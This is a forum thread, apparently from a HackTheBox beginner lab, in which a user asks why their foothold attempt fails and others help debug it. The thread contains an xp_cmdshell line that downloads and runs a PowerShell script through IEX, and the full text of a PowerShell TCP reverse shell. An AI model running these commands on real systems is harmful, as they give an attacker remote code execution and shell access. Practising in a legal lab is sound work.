Starting point (Foothold Section)
Please help, I am new to HackTheBox and find myself stuck , after i run the command: xp_cmdshell "powershell "IEX New-Object Net.WebClient.DownloadString"http://10.10.14.2/shell.ps1\“;”
I get nothing, i used pwd and whoami but get nothing. After i run command i also notice that my server gives this result: python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) …
127.0.0.1 - - [17/Apr/2020 05:24:58] “GET /Downloads/shell.ps1 HTTP/1.1” 304 -
It looks like the shell.ps1 cannot be located, but the file is stored in Downloads.
Any Help would be appreciated.
zerox1…
python3 -m http.server 8080 uses the current working directory as root for the webserver. Go to localhost:8080 with your web browser and check if the shell.ps1 is really there.
Thank for reply QHx5, i did check to see if file was there, i have to naviagte through downloads to get to shell.ps1, when i click on it is asks to be saved so i do. below is my script:
$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.2”,8080);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Any idea’s. Aslo how did you run your shell.ps1.
thanks for your help.
zerox1
Your reverse shell points to 8080, but your webserver is already running on that port. you will need a netcat listener on a different port and point the reverse shell there.
When you have to enter any directory on your webserver to download the ps1 manually, you have to pass the path also in the powershell command. Just start the http server directly in the folder where the file is you want to download.
I will give it ago, thanks again. Just another question i created my shell with gedit. would this cause any issue. what command did you use to run the shell.ps1.